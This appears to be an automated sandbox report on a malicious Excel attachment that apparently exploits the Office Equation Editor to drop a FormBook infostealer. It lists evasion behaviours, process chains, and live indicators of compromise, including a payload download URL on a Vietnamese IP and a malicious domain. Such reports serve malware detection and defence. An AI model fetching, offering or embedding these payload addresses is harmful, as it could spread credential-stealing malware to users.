Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1036 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: EQNEDT32.EXE, 00000002.00000002.956335622.00000000006F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EQNEDT32.EXE, 00000002.00000002.956117653.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036306C7 mov edx, dword ptr fs:[00000030h] 2_2_036306C7
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 626598 Sample: TedarikciSiparisi_83613 .xlsx Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 27 Found malware configuration 2->27 29 Malicious sample detected (through community Yara rule) 2->29 31 Antivirus detection for URL or domain 2->31 33 12 other signatures 2->33 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 33 25 2->12         started        process3 dnsIp4 25 180.214.238.224, 49171, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 7->25 19 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->19 dropped 21 C:\Users\Public\vbc.exe, PE32 7->21 dropped 35 Office equation editor establishes network connection 7->35 37 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->37 14 vbc.exe 7->14         started        23 C:\Users\...\~$TedarikciSiparisi_83613 .xlsx, data 12->23 dropped file5 signatures6 process7 signatures8 39 Multi AV Scanner detection for dropped file 14->39 41 Machine Learning detection for dropped file 14->41 17 aspnet_compiler.exe 14->17         started        process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
180.214.238.224
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://180.214.238.224/__cloud_for_file/vbc.exe true
  • Avira URL Cloud: malware
 unknown
www.mentalnayaarifmetika.online/ocgr/ true
  • Avira URL Cloud: malware
 low